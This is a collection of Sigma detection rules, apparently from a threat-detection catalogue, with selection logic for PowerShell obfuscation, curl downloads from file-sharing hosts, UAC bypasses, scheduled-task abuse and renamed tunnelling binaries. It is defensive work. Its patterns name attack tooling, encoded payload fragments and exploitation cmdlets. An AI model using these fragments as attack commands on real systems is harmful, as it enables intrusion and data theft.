- DuplicateTokenEx
- EnumerateSecurityPackages
- FreeHGlobal
- FreeLibrary
- GetDelegateForFunctionPointer
- GetLogonSessionData
- GetModuleHandle
- GetProcAddress
- GetProcessHandle
- GetTokenInformation
- ImpersonateLoggedOnUser
- kernel32
- LoadLibrary
- memcpy
- MiniDumpWriteDump
- ntdll
- OpenDesktop
- OpenProcess
- OpenProcessToken
- OpenThreadToken
- OpenWindowStation
- PtrToString
- QueueUserApc
- ReadProcessMemory
- RevertToSelf
- RtlCreateUserThread
- secur32
- SetThreadToken
- VirtualAlloc
- VirtualFree
- VirtualProtect
- WaitForSingleObject
- WriteInt32
- WriteProcessMemory
- ZeroFreeGlobalAllocUnicode
Python Spawning Pretty TTY on Windows
- source: sigma
- technicques:
- t1059
Description
Detects python spawning a pretty tty
Detection logic
condition: selection_img and 1 of selection_cli_*
selection_cli_1:
CommandLine|contains|all:
- import pty
- .spawn(
selection_cli_2:
CommandLine|contains: from pty import spawn
selection_img:
Image|endswith:
- python.exe
- python3.exe
- python2.exe
Whoami.EXE Execution From Privileged Process
- source: sigma
- technicques:
- t1033
Description
Detects the execution of “whoami.exe” by privileged accounts that are often abused by threat actors
Detection logic
condition: all of selection_*
selection_img:
- OriginalFileName: whoami.exe
- Image|endswith: \whoami.exe
selection_user:
User|contains:
- AUTHORI
- AUTORI
- TrustedInstaller
HackTool - SharpLDAPmonitor Execution
- source: sigma
- technicques:
Description
Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.
Detection logic
condition: 1 of selection_*
selection_cli:
CommandLine|contains|all:
- '/user:'
- '/pass:'
- '/dcip:'
selection_img:
- Image|endswith: \SharpLDAPmonitor.exe
- OriginalFileName: SharpLDAPmonitor.exe
Application Terminated Via Wmic.EXE
- source: sigma
- technicques:
- t1047
Description
Detects calls to the “terminate” function via wmic in order to kill an application
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- call
- terminate
selection_img:
- Image|endswith: \WMIC.exe
- OriginalFileName: wmic.exe
Suspicious File Download From File Sharing Domain Via Curl.EXE
- source: sigma
- technicques:
Description
Detects potentially suspicious file download from file sharing domains using curl.exe
Detection logic
condition: all of selection_*
selection_ext:
CommandLine|endswith:
- .ps1
- .ps1'
- .ps1"
- .dat
- .dat'
- .dat"
- .msi
- .msi'
- .msi"
- .bat
- .bat'
- .bat"
- .exe
- .exe'
- .exe"
- .vbs
- .vbs'
- .vbs"
- .vbe
- .vbe'
- .vbe"
- .hta
- .hta'
- .hta"
- .dll
- .dll'
- .dll"
- .psm1
- .psm1'
- .psm1"
selection_flag:
CommandLine|contains:
- ' -O'
- --remote-name
- --output
selection_http:
CommandLine|contains: http
selection_img:
- Image|endswith: \curl.exe
- OriginalFileName: curl.exe
selection_websites:
CommandLine|contains:
- .githubusercontent.com
- anonfiles.com
- cdn.discordapp.com
- cdn.discordapp.com/attachments/
- ddns.net
- dl.dropboxusercontent.com
- ghostbin.co
- glitch.me
- gofile.io
- hastebin.com
- mediafire.com
- mega.nz
- onrender.com
- paste.ee
- pastebin.com
- pastebin.pl
- pastetext.net
- privatlab.com
- privatlab.net
- send.exploit.in
- sendspace.com
- storage.googleapis.com
- storjshare.io
- supabase.co
- temp.sh
- transfer.sh
- ufile.io
Control Panel Items
- source: sigma
- technicques:
- t1218
- t1218.002
- t1546
Description
Detects the malicious use of a control panel item
Detection logic
condition: all of selection_reg_* or (selection_cpl and not 1 of filter_cpl_*)
filter_cpl_igfx:
CommandLine|contains|all:
- 'regsvr32 '
- ' /s '
- igfxCPL.cpl
filter_cpl_sys:
CommandLine|contains:
- \System32\
- '%System%'
- '|C:\Windows\system32|'
selection_cpl:
CommandLine|endswith: .cpl
selection_reg_cli:
CommandLine|contains|all:
- add
- CurrentVersion\Control Panel\CPLs
selection_reg_img:
- Image|endswith: \reg.exe
- OriginalFileName: reg.exe
Net WebClient Casing Anomalies
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques
Detection logic
condition: all of selection_*
selection_encoded:
CommandLine|contains:
- TgBlAFQALgB3AEUAQg
- 4AZQBUAC4AdwBFAEIA
- OAGUAVAAuAHcARQBCA
- bgBFAHQALgB3AGUAYg
- 4ARQB0AC4AdwBlAGIA
- uAEUAdAAuAHcAZQBiA
- TgBFAHQALgB3AGUAYg
- OAEUAdAAuAHcAZQBiA
- bgBlAFQALgB3AGUAYg
- 4AZQBUAC4AdwBlAGIA
- uAGUAVAAuAHcAZQBiA
- TgBlAFQALgB3AGUAYg
- OAGUAVAAuAHcAZQBiA
- bgBFAFQALgB3AGUAYg
- 4ARQBUAC4AdwBlAGIA
- uAEUAVAAuAHcAZQBiA
- bgBlAHQALgBXAGUAYg
- 4AZQB0AC4AVwBlAGIA
- uAGUAdAAuAFcAZQBiA
- bgBFAHQALgBXAGUAYg
- 4ARQB0AC4AVwBlAGIA
- uAEUAdAAuAFcAZQBiA
- TgBFAHQALgBXAGUAYg
- OAEUAdAAuAFcAZQBiA
- bgBlAFQALgBXAGUAYg
- 4AZQBUAC4AVwBlAGIA
- uAGUAVAAuAFcAZQBiA
- TgBlAFQALgBXAGUAYg
- OAGUAVAAuAFcAZQBiA
- bgBFAFQALgBXAGUAYg
- 4ARQBUAC4AVwBlAGIA
- uAEUAVAAuAFcAZQBiA
- bgBlAHQALgB3AEUAYg
- 4AZQB0AC4AdwBFAGIA
- uAGUAdAAuAHcARQBiA
- TgBlAHQALgB3AEUAYg
- OAGUAdAAuAHcARQBiA
- bgBFAHQALgB3AEUAYg
- 4ARQB0AC4AdwBFAGIA
- uAEUAdAAuAHcARQBiA
- TgBFAHQALgB3AEUAYg
- OAEUAdAAuAHcARQBiA
- bgBlAFQALgB3AEUAYg
- 4AZQBUAC4AdwBFAGIA
- uAGUAVAAuAHcARQBiA
- TgBlAFQALgB3AEUAYg
- OAGUAVAAuAHcARQBiA
- bgBFAFQALgB3AEUAYg
- 4ARQBUAC4AdwBFAGIA
- uAEUAVAAuAHcARQBiA
- TgBFAFQALgB3AEUAYg
- OAEUAVAAuAHcARQBiA
- bgBlAHQALgBXAEUAYg
- 4AZQB0AC4AVwBFAGIA
- uAGUAdAAuAFcARQBiA
- TgBlAHQALgBXAEUAYg
- OAGUAdAAuAFcARQBiA
- bgBFAHQALgBXAEUAYg
- 4ARQB0AC4AVwBFAGIA
- uAEUAdAAuAFcARQBiA
- TgBFAHQALgBXAEUAYg
- OAEUAdAAuAFcARQBiA
- bgBlAFQALgBXAEUAYg
- 4AZQBUAC4AVwBFAGIA
- uAGUAVAAuAFcARQBiA
- TgBlAFQALgBXAEUAYg
- OAGUAVAAuAFcARQBiA
- bgBFAFQALgBXAEUAYg
- 4ARQBUAC4AVwBFAGIA
- uAEUAVAAuAFcARQBiA
- TgBFAFQALgBXAEUAYg
- OAEUAVAAuAFcARQBiA
- bgBlAHQALgB3AGUAQg
- 4AZQB0AC4AdwBlAEIA
- uAGUAdAAuAHcAZQBCA
- TgBlAHQALgB3AGUAQg
- OAGUAdAAuAHcAZQBCA
- bgBFAHQALgB3AGUAQg
- 4ARQB0AC4AdwBlAEIA
- uAEUAdAAuAHcAZQBCA
- TgBFAHQALgB3AGUAQg
- OAEUAdAAuAHcAZQBCA
- bgBlAFQALgB3AGUAQg
- 4AZQBUAC4AdwBlAEIA
- uAGUAVAAuAHcAZQBCA
- TgBlAFQALgB3AGUAQg
- OAGUAVAAuAHcAZQBCA
- bgBFAFQALgB3AGUAQg
- 4ARQBUAC4AdwBlAEIA
- uAEUAVAAuAHcAZQBCA
- TgBFAFQALgB3AGUAQg
- OAEUAVAAuAHcAZQBCA
- bgBlAHQALgBXAGUAQg
- 4AZQB0AC4AVwBlAEIA
- uAGUAdAAuAFcAZQBCA
- TgBlAHQALgBXAGUAQg
- OAGUAdAAuAFcAZQBCA
- bgBFAHQALgBXAGUAQg
- 4ARQB0AC4AVwBlAEIA
- uAEUAdAAuAFcAZQBCA
- TgBFAHQALgBXAGUAQg
- OAEUAdAAuAFcAZQBCA
- bgBlAFQALgBXAGUAQg
- 4AZQBUAC4AVwBlAEIA
- uAGUAVAAuAFcAZQBCA
- TgBlAFQALgBXAGUAQg
- OAGUAVAAuAFcAZQBCA
- bgBFAFQALgBXAGUAQg
- 4ARQBUAC4AVwBlAEIA
- uAEUAVAAuAFcAZQBCA
- TgBFAFQALgBXAGUAQg
- OAEUAVAAuAFcAZQBCA
- bgBlAHQALgB3AEUAQg
- 4AZQB0AC4AdwBFAEIA
- uAGUAdAAuAHcARQBCA
- TgBlAHQALgB3AEUAQg
- OAGUAdAAuAHcARQBCA
- bgBFAHQALgB3AEUAQg
- 4ARQB0AC4AdwBFAEIA
- uAEUAdAAuAHcARQBCA
- TgBFAHQALgB3AEUAQg
- OAEUAdAAuAHcARQBCA
- bgBlAFQALgB3AEUAQg
- uAGUAVAAuAHcARQBCA
- bgBFAFQALgB3AEUAQg
- 4ARQBUAC4AdwBFAEIA
- uAEUAVAAuAHcARQBCA
- TgBFAFQALgB3AEUAQg
- OAEUAVAAuAHcARQBCA
- TgBlAHQALgBXAEUAQg
- 4AZQB0AC4AVwBFAEIA
- OAGUAdAAuAFcARQBCA
- bgBFAHQALgBXAEUAQg
- 4ARQB0AC4AVwBFAEIA
- uAEUAdAAuAFcARQBCA
- TgBFAHQALgBXAEUAQg
- OAEUAdAAuAFcARQBCA
- bgBlAFQALgBXAEUAQg
- 4AZQBUAC4AVwBFAEIA
- uAGUAVAAuAFcARQBCA
- TgBlAFQALgBXAEUAQg
- OAGUAVAAuAFcARQBCA
- bgBFAFQALgBXAEUAQg
- 4ARQBUAC4AVwBFAEIA
- uAEUAVAAuAFcARQBCA
selection_img:
- Image|endswith:
- \powershell.exe
- \pwsh.exe
- OriginalFileName:
- PowerShell.EXE
- pwsh.dll
Unusual Child Process of dns.exe
- source: sigma
- technicques:
- t1133
Description
Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)
Detection logic
condition: selection and not filter
filter:
Image|endswith: \conhost.exe
selection:
ParentImage|endswith: \dns.exe
Suspicious RunAs-Like Flag Combination
- source: sigma
- technicques:
Description
Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools
Detection logic
condition: all of selection*
selection_command:
CommandLine|contains:
- ' -c cmd'
- ' -c "cmd'
- ' -c powershell'
- ' -c "powershell'
- ' --command cmd'
- ' --command powershell'
- ' -c whoami'
- ' -c wscript'
- ' -c cscript'
selection_user:
CommandLine|contains:
- ' -u system '
- ' --user system '
- ' -u NT'
- ' -u "NT'
- ' -u ''NT'
- ' --system '
- ' -u administrator '
Potential Commandline Obfuscation Using Escape Characters
- source: sigma
- technicques:
- t1140
Description
Detects potential commandline obfuscation using known escape characters
Detection logic
condition: selection
selection:
CommandLine|contains:
- h^t^t^p
- h"t"t"p
Suspicious Schtasks Execution AppData Folder
- source: sigma
- technicques:
- t1053
- t1053.005
- t1059
- t1059.001
Description
Detects the creation of a schtask that executes a file from C:\Users<USER>\AppData\Local
Detection logic
condition: selection and not filter
filter:
CommandLine|contains: /TN TVInstallRestore
Image|endswith: \schtasks.exe
ParentImage|contains|all:
- \AppData\Local\Temp\
- TeamViewer_.exe
selection:
CommandLine|contains:
- NT AUT
- ' SYSTEM '
CommandLine|contains|all:
- /Create
- /RU
- /TR
- C:\Users\
- \AppData\Local\
Image|endswith: \schtasks.exe
Suspicious Obfuscated PowerShell Code
- source: sigma
- technicques:
Description
Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines
Detection logic
condition: selection
selection:
CommandLine|contains:
- IAAtAGIAeABvAHIAIAAwAHgA
- AALQBiAHgAbwByACAAMAB4A
- gAC0AYgB4AG8AcgAgADAAeA
- AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg
- AuAEkAbgB2AG8AawBlACgAKQAgAHwAI
- ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC
- AHsAMQB9AHsAMAB9ACIAIAAtAGYAI
- B7ADEAfQB7ADAAfQAiACAALQBmAC
- AewAxAH0AewAwAH0AIgAgAC0AZgAg
- AHsAMAB9AHsAMwB9ACIAIAAtAGYAI
- B7ADAAfQB7ADMAfQAiACAALQBmAC
- AewAwAH0AewAzAH0AIgAgAC0AZgAg
- AHsAMgB9AHsAMAB9ACIAIAAtAGYAI
- B7ADIAfQB7ADAAfQAiACAALQBmAC
- AewAyAH0AewAwAH0AIgAgAC0AZgAg
- AHsAMQB9AHsAMAB9ACcAIAAtAGYAI
- B7ADEAfQB7ADAAfQAnACAALQBmAC
- AewAxAH0AewAwAH0AJwAgAC0AZgAg
- AHsAMAB9AHsAMwB9ACcAIAAtAGYAI
- B7ADAAfQB7ADMAfQAnACAALQBmAC
- AewAwAH0AewAzAH0AJwAgAC0AZgAg
- AHsAMgB9AHsAMAB9ACcAIAAtAGYAI
- B7ADIAfQB7ADAAfQAnACAALQBmAC
- AewAyAH0AewAwAH0AJwAgAC0AZgAg
Suspicious Execution of Systeminfo
- source: sigma
- technicques:
- t1082
Description
Detects usage of the “systeminfo” command to retrieve information
Detection logic
condition: selection
selection:
- Image|endswith: \systeminfo.exe
- OriginalFileName: sysinfo.exe
UtilityFunctions.ps1 Proxy Dll
- source: sigma
- technicques:
- t1216
Description
Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.
Detection logic
condition: selection
selection:
CommandLine|contains:
- UtilityFunctions.ps1
- 'RegSnapin '
Invoke-Obfuscation COMPRESS OBFUSCATION
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via COMPRESS OBFUSCATION
Detection logic
condition: selection
selection:
CommandLine|contains:
- system.io.compression.deflatestream
- system.io.streamreader
- readtoend(
CommandLine|contains|all:
- new-object
- text.encoding]::ascii
Potential PowerShell Execution Via DLL
- source: sigma
- technicques:
- t1218
- t1218.011
Description
Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll. This detection assumes that PowerShell commands are passed via the CommandLine.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- Default.GetString
- DownloadString
- FromBase64String
- 'ICM '
- 'IEX '
- Invoke-Command
- Invoke-Expression
selection_img:
- Image|endswith:
- \InstallUtil.exe
- \RegAsm.exe
- \RegSvcs.exe
- \regsvr32.exe
- \rundll32.exe
- OriginalFileName:
- InstallUtil.exe
- RegAsm.exe
- RegSvcs.exe
- REGSVR32.EXE
- RUNDLL32.EXE
Potential Provisioning Registry Key Abuse For Binary Proxy Execution
- source: sigma
- technicques:
- t1218
Description
Detects potential abuse of the provisioning registry key for indirect command execution through “Provlaunch.exe”.
Detection logic
condition: selection
selection:
CommandLine|contains: SOFTWARE\Microsoft\Provisioning\Commands\
UAC Bypass WSReset
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
Detection logic
condition: selection
selection:
Image|endswith: \wsreset.exe
IntegrityLevel:
- High
- System
Deleted Data Overwritten Via Cipher.EXE
- source: sigma
- technicques:
- t1485
Description
Detects usage of the “cipher” built-in utility in order to overwrite deleted data from disk. Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: ' /w:'
selection_img:
- OriginalFileName: CIPHER.EXE
- Image|endswith: \cipher.exe
UAC Bypass Tools Using ComputerDefaults
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
Detection logic
condition: selection and not filter
filter:
ParentImage|contains:
- :\Windows\System32
- :\Program Files
selection:
Image: C:\Windows\System32\ComputerDefaults.exe
IntegrityLevel:
- High
- System
HackTool - Empire PowerShell UAC Bypass
- source: sigma
- technicques:
- t1548
- t1548.002
Description
Detects some Empire PowerShell UAC bypass methods
Detection logic
condition: selection
selection:
CommandLine|contains:
- ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update)'
- ' -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update);'
Suspicious Modification Of Scheduled Tasks
- source: sigma
- technicques:
- t1053
- t1053.005
Description
Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location Attackers can create a simple looking task in order to avoid detection on creation as it’s often the most focused on Instead they modify the task after creation to include their malicious payload
Detection logic
condition: all of selection_*
selection_schtasks:
CommandLine|contains|all:
- ' /Change '
- ' /TN '
Image|endswith: \schtasks.exe
selection_susp_images:
CommandLine|contains:
- regsvr32
- rundll32
- 'cmd /c '
- 'cmd /k '
- 'cmd /r '
- 'cmd.exe /c '
- 'cmd.exe /k '
- 'cmd.exe /r '
- powershell
- mshta
- wscript
- cscript
- certutil
- bitsadmin
- bash.exe
- 'bash '
- scrcons
- 'wmic '
- wmic.exe
- forfiles
- scriptrunner
- hh.exe
- 'hh '
selection_susp_locations:
CommandLine|contains:
- \AppData\Local\Temp
- \AppData\Roaming\
- \Users\Public\
- \WINDOWS\Temp\
- \Desktop\
- \Downloads\
- \Temporary Internet
- C:\ProgramData\
- C:\Perflogs\
- '%ProgramData%'
- '%appdata%'
- '%comspec%'
- '%localappdata%'
System Network Connections Discovery Via Net.EXE
- source: sigma
- technicques:
- t1049
Description
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Detection logic
condition: all of selection_*
selection_cli:
- CommandLine|endswith:
- ' use'
- ' sessions'
- CommandLine|contains:
- ' use '
- ' sessions '
selection_img:
- Image|endswith:
- \net.exe
- \net1.exe
- OriginalFileName:
- net.exe
- net1.exe
Suspicious WebDav Client Execution Via Rundll32.EXE
- source: sigma
- technicques:
- t1048
- t1048.003
Description
Detects “svchost.exe” spawning “rundll32.exe” with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397
Detection logic
condition: selection and not 1 of filter_*
filter_local_ips:
CommandLine|contains:
- ://10.
- ://192.168.
- ://172.16.
- ://172.17.
- ://172.18.
- ://172.19.
- ://172.20.
- ://172.21.
- ://172.22.
- ://172.23.
- ://172.24.
- ://172.25.
- ://172.26.
- ://172.27.
- ://172.28.
- ://172.29.
- ://172.30.
- ://172.31.
- ://127.
- ://169.254.
selection:
CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie
CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}
Image|endswith: \rundll32.exe
ParentCommandLine|contains: -s WebClient
ParentImage|endswith: \svchost.exe
Suspicious Extrac32 Alternate Data Stream Execution
- source: sigma
- technicques:
- t1564
- t1564.004
Description
Extract data from cab file and hide it in an alternate data stream
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- extrac32.exe
- .cab
CommandLine|re: :[^\\]
Potential Privilege Escalation Using Symlink Between Osk and Cmd
- source: sigma
- technicques:
- t1546
- t1546.008
Description
Detects the creation of a symbolic link between “cmd.exe” and the accessibility on-screen keyboard binary (osk.exe) using “mklink”. This technique provides an elevated command prompt to the user from the login screen without the need to log in.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|all:
- mklink
- \osk.exe
- \cmd.exe
selection_img:
- Image|endswith: \cmd.exe
- OriginalFileName: Cmd.Exe
Rundll32 Execution With Uncommon DLL Extension
- source: sigma
- technicques:
- t1218
- t1218.011
Description
Detects the execution of rundll32 with a command line that doesn’t contain a common extension
Detection logic
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
filter_main_empty:
CommandLine: ''
filter_main_known_extension:
- CommandLine|contains:
- '.cpl '
- .cpl,
- .cpl"
- .cpl'
- '.dll '
- .dll,
- .dll"
- .dll'
- '.inf '
- .inf,
- .inf"
- .inf'
- CommandLine|endswith:
- .cpl
- .dll
- '.inf'
filter_main_localserver:
CommandLine|contains: ' -localserver '
filter_main_null:
CommandLine: null
filter_main_zzzzInvokeManagedCustomActionOutOfProc:
CommandLine|contains|all:
- :\Windows\Installer\
- .tmp
- zzzzInvokeManagedCustomActionOutOfProc
ParentImage|endswith: \msiexec.exe
filter_optional_EdgeUpdate:
ParentCommandLine|contains|all:
- :\Users\
- \AppData\Local\Microsoft\EdgeUpdate\Install\{
- \EDGEMITMP_
- .tmp\setup.exe
- --install-archive=
- --previous-version=
- --msedgewebview --verbose-logging --do-not-launch-msedge --user-level
selection:
- Image|endswith: \rundll32.exe
- OriginalFileName: RUNDLL32.EXE
Run PowerShell Script from Redirected Input Stream
- source: sigma
- technicques:
- t1059
Description
Detects PowerShell script execution via input stream redirect
Detection logic
condition: selection
selection:
CommandLine|re: \s-\s*<
Image|endswith:
- \powershell.exe
- \pwsh.exe
Service Reconnaissance Via Wmic.EXE
- source: sigma
- technicques:
- t1047
Description
An adversary might use WMI to check if a certain remote service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that “No instance(s) Available” if the service queried is not running. A common error message is “Node - (provided IP or default) ERROR Description =The RPC server is unavailable” if the provided remote host is unreachable
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains: service
selection_img:
- Image|endswith: \WMIC.exe
- OriginalFileName: wmic.exe
Remote CHM File Download/Execution Via HH.EXE
- source: sigma
- technicques:
- t1218
- t1218.001
Description
Detects the usage of “hh.exe” to execute/download remotely hosted “.chm” files.
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains:
- http://
- https://
- \\\\
selection_img:
- OriginalFileName: HH.exe
- Image|endswith: \hh.exe
Suspicious Powercfg Execution To Change Lock Screen Timeout
- source: sigma
- technicques:
Description
Detects suspicious execution of ‘Powercfg.exe’ to change lock screen timeout
Detection logic
condition: all of selection_*
selection_power:
- Image|endswith: \powercfg.exe
- OriginalFileName: PowerCfg.exe
selection_standby:
- CommandLine|contains|all:
- '/setacvalueindex '
- SCHEME_CURRENT
- SUB_VIDEO
- VIDEOCONLOCK
- CommandLine|contains|all:
- '-change '
- -standby-timeout-
Suspicious Rundll32 Invoking Inline VBScript
- source: sigma
- technicques:
- t1055
Description
Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- rundll32.exe
- Execute
- RegRead
- window.close
Suspicious File Download From IP Via Curl.EXE
- source: sigma
- technicques:
Description
Detects potentially suspicious file downloads directly from IP addresses using curl.exe
Detection logic
condition: all of selection_*
selection_ext:
CommandLine|endswith:
- .bat
- .bat"
- .dat
- .dat"
- .dll
- .dll"
- .exe
- .exe"
- .gif
- .gif"
- .hta
- .hta"
- .jpeg
- .jpeg"
- .log
- .log"
- .msi
- .msi"
- .png
- .png"
- .ps1
- .ps1"
- .psm1
- .psm1"
- .vbe
- .vbe"
- .vbs
- .vbs"
- .bat'
- .dat'
- .dll'
- .exe'
- .gif'
- .hta'
- .jpeg'
- .log'
- .msi'
- .png'
- .ps1'
- .psm1'
- .vbe'
- .vbs'
selection_flag:
CommandLine|contains:
- ' -O'
- --remote-name
- --output
selection_http:
CommandLine|contains: http
selection_img:
- Image|endswith: \curl.exe
- OriginalFileName: curl.exe
selection_ip:
CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}
File In Suspicious Location Encoded To Base64 Via Certutil.EXE
- source: sigma
- technicques:
- t1027
Description
Detects the execution of certutil with the “encode” flag to encode a file to base64 where the files are located in potentially suspicious locations
Detection logic
condition: all of selection_*
selection_cli:
CommandLine|contains|windash: -encode
selection_extension:
CommandLine|contains:
- \AppData\Roaming\
- \Desktop\
- \Local\Temp\
- \PerfLogs\
- \Users\Public\
- \Windows\Temp\
- $Recycle.Bin
selection_img:
- Image|endswith: \certutil.exe
- OriginalFileName: CertUtil.exe
Renamed Cloudflared.EXE Execution
- source: sigma
- technicques:
- t1090
- t1090.001
Description
Detects the execution of a renamed “cloudflared” binary.
Detection logic
condition: 1 of selection_* and not 1 of filter_main_*
filter_main_known_names:
Image|endswith:
- \cloudflared.exe
- \cloudflared-windows-386.exe
- \cloudflared-windows-amd64.exe
selection_accountless:
CommandLine|contains|all:
- -url
- tunnel
selection_cleanup:
CommandLine|contains:
- '-config '
- '-connector-id '
CommandLine|contains|all:
- ' tunnel '
- 'cleanup '
selection_hashes:
Hashes|contains:
- SHA256=2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29
- SHA256=b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8
- SHA256=1fbd8362b2d2d2e6a5750ae3db69cd1815e6c1d31da48a98b796450971a8e039
- SHA256=0409c9b12f9d0eda86e461ed9bdabeefb00172b26322079681a0bdf48e68dc28
- SHA256=7cfb411d04bac42ef93d1f0c93c0a481e38c6f4612b97ae89d4702595988edc7
- SHA256=5b3c2d846ab162dc6bc595cce3a49de5731afde5d6060be7066d21b013a28373
- SHA256=ce95df7f69664c3df19b76028e115931919a71517b776da7b42d353e2ff4a670
- SHA256=1293525a19cfe3bc8296b62fbfe19f083632ed644a1c18c10b045a1d3030d81a
- SHA256=af2b9161cfcb654b16408cd6b098afe9d1fb61a037d18d7090a119d4c0c8e0f0
- SHA256=39ddceb56a15798826a5fc4892fa2b474c444bb4d7a8bf2fa95e41cab10fa7a1
- SHA256=ccd11f2328023a0e7929e845d5b6e7bc783fb4650d65faef3ae090239d4bbce2
- SHA256=b6e5c5d2567ae8c69cc012ebcae30e6c9b5359d64a58d17ba75ec89f8bce71ac
- SHA256=f813484ea441404f18caad96f28138e8aaf0cb256163c09c2ab8a3acab87f69f
- SHA256=fc4a0802ab9c7409b892ca00636bec61e2acfc911bccfdeb9978b8ab5a2f828d
- SHA256=083150724b49604c8765c1ba19541fa260b133be0acb0647fcd936d81f054499
- SHA256=44303d6572956f28a0f2e4b188934fb9874f2584f5c81fa431a463cfbf28083b
- SHA256=5d38c46032a58e28ae5f7d174d8761ec3d64d186677f3ec53af5f51afb9bfd2f
- SHA256=e1e70fa42059911bc6685fafef957f9a73fc66f214d0704a9b932683a5204032
- SHA256=c01356092a365b84f84f0e66870bd1a05ba3feb53cafd973fa5fea2534bee234
- SHA256=b3f9c06151e30ee43d39e788a79cd918a314f24e04fe87f3de8272a2057b624f
- SHA256=cd81b2792f0739f473c31c9cb7cf2313154bfa28b839975802b90e8790bb5058
- SHA256=9ec7e6c8e1bfd883663d8d9d62c9e4f9ae373b731407181e32491b27a7218a2c
- SHA256=c2cfd23fdc6c0e1b1ffa0e545cbe556f18d11b362b4a89ba0713f6ab01c4827f
- SHA256=53f8adbd76c0eb16f5e43cadde422474d8a06f9c8f959389c1930042ad8beaa5
- SHA256=648c8d2f8001c113d2986dd00b7bbd181593d462bef73522cee212c4f71f95b3
- SHA256=ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4
- SHA256=3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c
- SHA256=f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4
- SHA256=d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f
- SHA256=bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad
- SHA256=b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7
- SHA256=f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75
- SHA256=b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6
- SHA256=f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688
- SHA256=d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f
- SHA256=d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663
- SHA256=2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77
- SHA256=19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078
selection_tunnel:
CommandLine|contains:
- '-config '
- '-credentials-contents '
- '-credentials-file '
- '-token '
CommandLine|contains|all:
- ' tunnel '
- ' run '
Non-privileged Usage of Reg or Powershell
- source: sigma
- technicques:
- t1112
Description
Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry
Detection logic
condition: (reg or powershell) and select_data
powershell:
CommandLine|contains:
- powershell
- set-itemproperty
- ' sp '
- new-itemproperty
reg:
CommandLine|contains|all:
- 'reg '
- add
select_data:
CommandLine|contains:
- ImagePath
- FailureCommand
- ServiceDLL
CommandLine|contains|all:
- ControlSet
- Services
IntegrityLevel: Medium
Malicious PowerShell Commandlets - ProcessCreation
- source: sigma
- technicques:
- t1059
- t1059.001
- t1069
- t1069.001
- t1069.002
- t1087
- t1087.001
- t1087.002
- t1482
Description
Detects Commandlet names from well-known PowerShell exploitation frameworks
Detection logic
condition: selection
selection:
CommandLine|contains:
- Add-Exfiltration
- Add-Persistence
- Add-RegBackdoor
- Add-RemoteRegBackdoor
- Add-ScrnSaveBackdoor
- Check-VM
- ConvertTo-Rc4ByteStream
- Decrypt-Hash
- Disable-ADIDNSNode
- Disable-MachineAccount
- Do-Exfiltration
- Enable-ADIDNSNode
- Enable-MachineAccount
- Enabled-DuplicateToken
- Exploit-Jboss
- Export-ADR
- Export-ADRCSV
- Export-ADRExcel
- Export-ADRHTML
- Export-ADRJSON
